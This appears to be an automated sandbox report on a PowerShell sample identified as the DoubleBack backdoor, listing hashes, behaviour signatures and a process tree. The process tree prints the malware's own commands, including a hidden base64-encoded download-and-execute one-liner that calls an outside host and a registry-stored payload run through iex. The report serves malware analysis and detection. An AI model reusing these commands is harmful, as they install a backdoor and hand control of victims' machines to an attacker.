Overview

overview

10

Static

static

work.ps1

windows7_x64

10

work.ps1

windows10_x64

8

Analysis

  • max time kernel
    78s
  • max time network
    162s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    25-08-2021 14:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    work.ps1

  • Size

    1.4MB

  • MD5

    7ba4b5c5d3e3276a3cfe8d581cf7173b

  • SHA1

    79ba87b46562e75f097c1b6d23d3b63b9160bbaa

  • SHA256

    73737bf28fa00ea1380bf98a76f6c2ff34bf25e8b489750acccc45df8e898022

  • SHA512

    ccccc4402edc1c333f2b11955b4c2850f5b68674e473d57521cb009e2047a46f9c57c0151b9191d4a2e3b10931723d0191bba9b299ffb3bb293ff7d6f83598c6

Score
10/10
doublebackbackdoor

Malware Config

Signatures

  • DoubleBack

    DoubleBack is a modular backdoor first seen in December 2020.

    backdoordoubleback
  • DoubleBack x64 Payload 2 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Modifies registry class 22 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\work.ps1
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2028
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -enc JABNAD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAnAGgAdAB0AHAAOgAvAC8AYQB0AGgAaQBuAGcAYwBhAGwAbABlAGQAYwBhAGsAZQAuAGMAbwBtAC8AZgBpAGwAZQAnACkAOwAkAHQAPQAkAE0ALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApADsAJABSAD0AJAB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQA7ACQARgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACQAUgA7ACQAcAA9ACQARgAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AGkAZQB4ACgAJABwACkAOwAgAA==
      2⤵
      • Blocklisted process makes network request
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:472
      • C:\Windows\system32\msiexec.exe
        C:\Windows\system32\msiexec.exe
        3⤵
        • Blocklisted process makes network request
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:896
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -c "&{$v1='7666';$k1='hkcu:\Software\Classes\CLSID';$p1=(gp $k1).$v1;rp $k1 $v1;set-itemproperty -pat $k1 -n $v1 -va ($p1|iex);exit}"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1968

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/472-76-0x000000001AB64000-0x000000001AB66000-memory.dmp

    Filesize

    8KB

    Download

  • memory/472-85-0x0000008800000000-0x000000880000C000-memory.dmp

    Filesize

    48KB

    Download

  • memory/472-83-0x000000001AB6C000-0x000000001AB8B000-memory.dmp

    Filesize

    124KB

    Download

  • memory/472-84-0x000000001A910000-0x000000001A919000-memory.dmp

    Filesize

    36KB

    Download

  • memory/472-82-0x000000001AB66000-0x000000001AB68000-memory.dmp

    Filesize

    8KB

    Download

  • memory/472-81-0x000000001C370000-0x000000001C371000-memory.dmp

    Filesize

    4KB

    Download

  • memory/472-80-0x000000001CB20000-0x000000001CB21000-memory.dmp

    Filesize

    4KB

    Download

  • memory/472-75-0x000000001AB60000-0x000000001AB62000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1968-89-0x00000000023E0000-0x00000000023E1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1968-96-0x000000001B900000-0x000000001B901000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1968-95-0x000000001B640000-0x000000001B641000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1968-94-0x000000001A904000-0x000000001A906000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1968-93-0x000000001A900000-0x000000001A902000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1968-92-0x00000000024B0000-0x00000000024B1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1968-91-0x00000000025F0000-0x00000000025F1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1968-90-0x000000001AA60000-0x000000001AA61000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2028-64-0x000000001AB90000-0x000000001AB92000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2028-61-0x0000000002350000-0x0000000002351000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2028-60-0x000007FEFC411000-0x000007FEFC413000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2028-62-0x000000001AC10000-0x000000001AC11000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2028-63-0x0000000001E80000-0x0000000001E81000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2028-65-0x000000001AB94000-0x000000001AB96000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2028-69-0x000000001C670000-0x000000001C671000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2028-66-0x00000000005A0000-0x00000000005A1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2028-67-0x000000001C520000-0x000000001C521000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2028-68-0x000000001AB9A000-0x000000001ABB9000-memory.dmp

    Filesize

    124KB

    Download